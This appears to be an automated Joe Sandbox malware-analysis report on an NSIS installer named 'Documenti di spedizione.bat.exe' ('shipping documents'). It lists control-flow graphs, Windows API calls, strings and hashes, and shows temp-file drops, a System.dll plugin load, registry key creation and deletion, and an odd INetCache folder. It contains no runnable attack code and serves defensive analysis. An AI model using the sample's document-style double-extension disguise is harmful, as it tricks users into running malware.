                                            control_flow_graph 356 402d4a-402d98 GetTickCount GetModuleFileNameA call 405b6a 359 402da4-402dd2 call 405ef7 call 4059b0 call 405ef7 GetFileSize 356->359 360 402d9a-402d9f 356->360 368 402ec2-402ed0 call 402cab 359->368 369 402dd8-402def 359->369 361 402fe9-402fed 360->361 375 402fa1-402fa6 368->375 376 402ed6-402ed9 368->376 371 402df1 369->371 372 402df3-402e00 call 403261 369->372 371->372 380 402e06-402e0c 372->380 381 402f5d-402f65 call 402cab 372->381 375->361 378 402f05-402f51 GlobalAlloc call 406373 call 405b99 CreateFileA 376->378 379 402edb-402ef3 call 403277 call 403261 376->379 406 402f53-402f58 378->406 407 402f67-402f97 call 403277 call 402ff0 378->407 379->375 404 402ef9-402eff 379->404 385 402e8c-402e90 380->385 386 402e0e-402e26 call 405b25 380->386 381->375 389 402e92-402e98 call 402cab 385->389 390 402e99-402e9f 385->390 386->390 403 402e28-402e2f 386->403 389->390 395 402ea1-402eaf call 406305 390->395 396 402eb2-402ebc 390->396 395->396 396->368 396->369 403->390 408 402e31-402e38 403->408 404->375 404->378 406->361 416 402f9c-402f9f 407->416 408->390 410 402e3a-402e41 408->410 410->390 411 402e43-402e4a 410->411 411->390 413 402e4c-402e6c 411->413 413->375 415 402e72-402e76 413->415 417 402e78-402e7c 415->417 418 402e7e-402e86 415->418 416->375 419 402fa8-402fb9 416->419 417->368 417->418 418->390 420 402e88-402e8a 418->420 421 402fc1-402fc6 419->421 422 402fbb 419->422 420->390 423 402fc7-402fcd 421->423 422->421 423->423 424 402fcf-402fe7 call 405b25 423->424 424->361
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402D5E
                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,00000400), ref: 00402D7A
                                              • Part of subcall function 00405B6A: GetFileAttributesA.KERNELBASE(00000003,00402D8D,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,80000000,00000003), ref: 00405B6E
                                              • Part of subcall function 00405B6A: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B90
                                            • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,C:\Users\user\Desktop\Documenti di spedizione.bat.exe,80000000,00000003), ref: 00402DC3
                                            • GlobalAlloc.KERNELBASE(00000040,00409130), ref: 00402F0A
                                            Strings
                                            • Error launching installer, xrefs: 00402D9A
                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402FA1
                                            • C:\Users\user\Desktop\Documenti di spedizione.bat.exe, xrefs: 00402D64, 00402D73, 00402D87, 00402DA4
                                            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402F53
                                            • "C:\Users\user\Desktop\Documenti di spedizione.bat.exe", xrefs: 00402D4A
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402D54, 00402F22
                                            • soft, xrefs: 00402E3A
                                            • Inst, xrefs: 00402E31
                                            • Null, xrefs: 00402E43
                                            • C:\Users\user\Desktop, xrefs: 00402DA5, 00402DAA, 00402DB0
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                            • String ID: "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Documenti di spedizione.bat.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                            • API String ID: 2803837635-2268054644
                                            • Opcode ID: e5ab56cf196d26c18991739aeee88d59d7819f5e2225516add2df55f48501880
                                            • Instruction ID: 1e54d23c6bd4663b885b54a46d63d50a2b02afe17d1d0705d7bda66adc4b1b0c
                                            • Opcode Fuzzy Hash: e5ab56cf196d26c18991739aeee88d59d7819f5e2225516add2df55f48501880
                                            • Instruction Fuzzy Hash: 6661E5B1A40215ABDF20AF64DE89A9E76B8EB04355F11413FF904B72C1C7BC9D418B9C

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 758 401759-40177c call 402ace call 4059d6 763 401786-401798 call 405ef7 call 405969 lstrcatA 758->763 764 40177e-401784 call 405ef7 758->764 769 40179d-4017a3 call 406162 763->769 764->769 774 4017a8-4017ac 769->774 775 4017ae-4017b8 call 4061fb 774->775 776 4017df-4017e2 774->776 783 4017ca-4017dc 775->783 784 4017ba-4017c8 CompareFileTime 775->784 778 4017e4-4017e5 call 405b45 776->778 779 4017ea-401806 call 405b6a 776->779 778->779 786 401808-40180b 779->786 787 40187e-4018a7 call 405110 call 402ff0 779->787 783->776 784->783 789 401860-40186a call 405110 786->789 790 40180d-40184f call 405ef7 * 2 call 405f19 call 405ef7 call 4056ed 786->790 800 4018a9-4018ad 787->800 801 4018af-4018bb SetFileTime 787->801 802 401873-401879 789->802 790->774 822 401855-401856 790->822 800->801 804 4018c1-4018cc CloseHandle 800->804 801->804 805 402967 802->805 807 4018d2-4018d5 804->807 808 40295e-402961 804->808 809 402969-40296d 805->809 811 4018d7-4018e8 call 405f19 lstrcatA 807->811 812 4018ea-4018ed call 405f19 807->812 808->805 818 4018f2-4022e2 call 4056ed 811->818 812->818 818->809 822->802 824 401858-401859 822->824 824->789
                                            APIs
                                            • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Subarachnoid,00000000,00000000,00000031), ref: 00401798
                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Subarachnoid,00000000,00000000,00000031), ref: 004017C2
                                              • Part of subcall function 00405EF7: lstrcpynA.KERNEL32(?,?,00000400,0040336D,00422F20,NSIS Error), ref: 00405F04
                                              • Part of subcall function 00405110: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                              • Part of subcall function 00405110: lstrlenA.KERNEL32(00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                              • Part of subcall function 00405110: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00402D22,00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000), ref: 0040516C
                                              • Part of subcall function 00405110: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll), ref: 0040517E
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                              • Part of subcall function 00405110: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                            • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously\Subarachnoid$C:\Users\user\AppData\Local\Temp\nsgDADD.tmp$C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll$Call
                                            • API String ID: 1941528284-1457120605
                                            • Opcode ID: f1777878cc107186975007c34ec6e0b6c00b7ce99c1c8040aed14bca133d0caf
                                            • Instruction ID: 1ba5c428860e61568eef0a4ccac71dac967fbf7ecb8295bcfefdc03a30224d69
                                            • Opcode Fuzzy Hash: f1777878cc107186975007c34ec6e0b6c00b7ce99c1c8040aed14bca133d0caf
                                            • Instruction Fuzzy Hash: 2341F471A04515BACF107BB5DC45EAF3678EF41328B20823BF021B11E2DA3C8A419FAD

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 825 405110-405125 826 4051db-4051df 825->826 827 40512b-40513d 825->827 828 405148-405154 lstrlenA 827->828 829 40513f-405143 call 405f19 827->829 831 405171-405175 828->831 832 405156-405166 lstrlenA 828->832 829->828 834 405184-405188 831->834 835 405177-40517e SetWindowTextA 831->835 832->826 833 405168-40516c lstrcatA 832->833 833->831 836 40518a-4051cc SendMessageA * 3 834->836 837 4051ce-4051d0 834->837 835->834 836->837 837->826 838 4051d2-4051d5 837->838 838->826
                                            APIs
                                            • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000,?), ref: 00405149
                                            • lstrlenA.KERNEL32(00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D22,00000000), ref: 00405159
                                            • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00402D22,00402D22,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,00000000,00000000,00000000), ref: 0040516C
                                            • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll), ref: 0040517E
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A4
                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051BE
                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 004051CC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp\System.dll
                                            • API String ID: 2531174081-3090368769
                                            • Opcode ID: 1646e66f1100ef219ca1350417871fd30607a5d42d26b8f3d60eba681ba6f46d
                                            • Instruction ID: 38fa31381a166635c2069e030e34d3db0945d62c2eda65f80c6bd2e149c96a35
                                            • Opcode Fuzzy Hash: 1646e66f1100ef219ca1350417871fd30607a5d42d26b8f3d60eba681ba6f46d
                                            • Instruction Fuzzy Hash: FD215C71E00518BBDF119FA5CD80ADFBFB9EB04354F14807AF904AA291C7799A41CFA8

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 839 4055d6-405621 CreateDirectoryA 840 405623-405625 839->840 841 405627-405634 GetLastError 839->841 842 40564e-405650 840->842 841->842 843 405636-40564a SetFileSecurityA 841->843 843->840 844 40564c GetLastError 843->844 844->842
                                            APIs
                                            • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405619
                                            • GetLastError.KERNEL32 ref: 0040562D
                                            • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405642
                                            • GetLastError.KERNEL32 ref: 0040564C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                            • API String ID: 3449924974-891493705
                                            • Opcode ID: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                            • Instruction ID: f6395dc840433d181f75b3fc8fae80690a43e09e82cbb082af9cf45b84ce1534
                                            • Opcode Fuzzy Hash: f10b22bb5142ab39e3e91bc7df170e02474760785f1b3b99a39c7e09e389b4b4
                                            • Instruction Fuzzy Hash: 82010871D04259EAEF119FA0DC44BEFBFB8EB14314F008576D908B6280D779A604CFAA

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 845 406222-406242 GetSystemDirectoryA 846 406244 845->846 847 406246-406248 845->847 846->847 848 406258-40625a 847->848 849 40624a-406252 847->849 851 40625b-40628d wsprintfA LoadLibraryExA 848->851 849->848 850 406254-406256 849->850 850->851
                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406239
                                            • wsprintfA.USER32 ref: 00406272
                                            • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406286
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%s.dll$UXTHEME$\
                                            • API String ID: 2200240437-4240819195
                                            • Opcode ID: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                            • Instruction ID: 4eb1d724573375327ef03b870ab6fb06d37159ba94d5fa14c1e1425601a81350
                                            • Opcode Fuzzy Hash: c7ba92785c192ffb77ecdfb90d0fa47c7b7783556fece6129122b9a6395f8fae
                                            • Instruction Fuzzy Hash: A2F0FC3090011AA7DB24B768DC0DFEB365CAB08305F1401BAA546E11D1D578F9258B69

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 852 4023d3-402419 call 402bc3 call 402ace * 2 RegCreateKeyExA 859 40295e-40296d 852->859 860 40241f-402427 852->860 861 402437-40243a 860->861 862 402429-402436 call 402ace lstrlenA 860->862 866 40243c-40244d call 402aac 861->866 867 40244e-402451 861->867 862->861 866->867 870 402462-402476 RegSetValueExA 867->870 871 402453-40245d call 402ff0 867->871 873 402478 870->873 874 40247b-402555 RegCloseKey 870->874 871->870 873->874 874->859 877 402729-402730 874->877 877->859
                                            APIs
                                            • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402411
                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsgDADD.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402431
                                            • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsgDADD.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246E
                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsgDADD.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040254F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CloseCreateValuelstrlen
                                            • String ID: C:\Users\user\AppData\Local\Temp\nsgDADD.tmp
                                            • API String ID: 1356686001-1129426339
                                            • Opcode ID: 532cf4714589016526744554cc58b87e9890b833549d6e086e2f56b221f18e11
                                            • Instruction ID: 45e6817f5ac0ad5077c8573445b5e51b6f54d3a00a8772886ac111494e5e57ea
                                            • Opcode Fuzzy Hash: 532cf4714589016526744554cc58b87e9890b833549d6e086e2f56b221f18e11
                                            • Instruction Fuzzy Hash: B52181B1E00109BEEB10EFA4DE49EAF7BB8EB54358F20403AF505B61D1D6B95D019B28

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 878 405b99-405ba3 879 405ba4-405bcf GetTickCount GetTempFileNameA 878->879 880 405bd1-405bd3 879->880 881 405bde-405be0 879->881 880->879 882 405bd5 880->882 883 405bd8-405bdb 881->883 882->883
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405BAD
                                            • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405BC7
                                            Strings
                                            • "C:\Users\user\Desktop\Documenti di spedizione.bat.exe", xrefs: 00405B99
                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B9C
                                            • nsa, xrefs: 00405BA4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: "C:\Users\user\Desktop\Documenti di spedizione.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-659548123
                                            • Opcode ID: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                            • Instruction ID: bfd989d901498d13fd43eebbd57bf0dae5b4b0e38faf5f28c0e1a6b78de2ea97
                                            • Opcode Fuzzy Hash: fefc0482c854070ed442c91c2c9b831f833a608d20a08577fe9f9df7fb59a314
                                            • Instruction Fuzzy Hash: B7F082367086046BEB108F55EC04B9B7BACDF91750F10C03BFA08DA1D0E6B5F9548B59

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 884 402b0e-402b37 RegOpenKeyExA 885 402ba2-402ba6 884->885 886 402b39-402b44 884->886 887 402b5f-402b6f RegEnumKeyA 886->887 888 402b71-402b83 RegCloseKey call 406290 887->888 889 402b46-402b49 887->889 897 402b85-402b94 888->897 898 402ba9-402baf 888->898 891 402b96-402b99 RegCloseKey 889->891 892 402b4b-402b5d call 402b0e 889->892 894 402b9f-402ba1 891->894 892->887 892->888 894->885 897->885 898->894 899 402bb1-402bbf RegDeleteKeyA 898->899 899->894 901 402bc1 899->901 901->885
                                            APIs
                                            • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402B2F
                                            • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B6B
                                            • RegCloseKey.ADVAPI32(?), ref: 00402B74
                                            • RegCloseKey.ADVAPI32(?), ref: 00402B99
                                            • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402BB7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2621262951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.2621246363.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621284624.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621299446.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.2621385916.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Close$DeleteEnumOpen
                                            • String ID:
                                            • API String ID: 1912718029-0
                                            • Opcode ID: 1b6bc3f1deefa661c1c70c6fa14cacfade3144c59ce8f26d4f2651a72c65fdc8
                                            • Instruction ID: cbb66f3b7e8ae2888f759c75a40f8dd5de3b5766fb854263a8955dc236021e84
                                            • Opcode Fuzzy Hash: 1b6bc3f1deefa661c1c70c6fa14cacfade3144c59ce8f26d4f2651a72c65fdc8
                                            • Instruction Fuzzy Hash: 39117C71A00108FFDF11AF90DE89DAA3B7DEB54345F004076FA05F10A0D378AE51AB69

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 902 100016bd-100016f9 call 10001a5d 906 1000180a-1000180c 902->906 907 100016ff-10001703 902->907 908 10001705-1000170b call 100021b0 907->908 909 1000170c-10001719 call 100021fa 907->909 908->909 914 10001749-10001750 909->914 915 1000171b-10001720 909->915 916 10001770-10001774 914->916 917 10001752-1000176e call 100023da call 10001559 call 10001266 GlobalFree 914->917 918 10001722-10001723 915->918 919 1000173b-1000173e 915->919 924 100017b2-100017b8 call 100023da 916->924 925 10001776-100017b0 call 10001559 call 100023da 916->925 942 100017b9-100017bd 917->942 922 10001725-10001726 918->922 923 1000172b-1000172c call 100027e8 918->923 919->914 920 10001740-10001741 call 10002aa3 919->920 934 10001746 920->934 930 10001733-10001739 call 10002589 922->930 931 10001728-10001729 922->931 937 10001731 923->937 924->942 925->942 941 10001748 930->941 931->914 931->923 934->941 937->934 941->914 945 100017fa-10001801 942->945 946 100017bf-100017cd call 100023a0 942->946 945->906 948 10001803-10001804 GlobalFree 945->948 952 100017e5-100017ec 946->952 953 100017cf-100017d2 946->953 948->906 952->945 955 100017ee-100017f9 call 100014e2 952->955 953->952 954 100017d4-100017dc 953->954 954->952 957 100017de-100017df FreeLibrary 954->957 955->945 957->952
                                            APIs
                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC4
                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CC9
                                              • Part of subcall function 10001A5D: GlobalFree.KERNEL32(?), ref: 10001CCE
                                            • GlobalFree.KERNEL32(00000000), ref: 10001768
                                            • FreeLibrary.KERNEL32(?), ref: 100017DF
                                            • GlobalFree.KERNEL32(00000000), ref: 10001804
                                              • Part of subcall function 100021B0: GlobalAlloc.KERNEL32(00000040,7D8BEC45), ref: 100021E2
                                              • Part of subcall function 10002589: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,10001739,00000000), ref: 100025FB
                                              • Part of subcall function 10001559: lstrcpyA.KERNEL32(00000000,?,00000000,10001695,00000000), ref: 10001572
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2629006314.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2628993182.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629018868.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            • Associated: 00000000.00000002.2629030864.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_Documenti di spedizione.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                            • String ID:
